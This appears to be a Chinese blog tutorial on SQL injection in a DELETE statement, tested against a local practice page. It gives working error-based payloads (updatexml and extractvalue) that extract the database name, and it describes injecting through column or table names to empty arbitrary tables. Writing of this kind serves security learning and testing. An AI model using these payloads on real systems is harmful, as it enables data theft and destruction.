访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。
delete语法:
DELETE FROM 【users】 WHERE 【username】 = 【'1'】
几个位置都可能存在注入,这里只演示一种。
下面演示注入到不同位置的方法。
一、String in WHERE clause
构造POC:
' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
获取数据库
二、Integer in WHERE clause
构造POC:
'' or extractvalue(1,concat(0x7e,database())) or ''
获取数据库
三、Column Name
注入点在【1】处
DELETE FROM users WHERE 【1】 = 1
利用方式:
1、清空users表
2、构造报错注入语句
四、Table Name
注入点在【1】处
DELETE FROM 1 WHERE isadmin = 0
利用方式:
1、清空任意表
2、构造报错,爆出数据
最后
欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
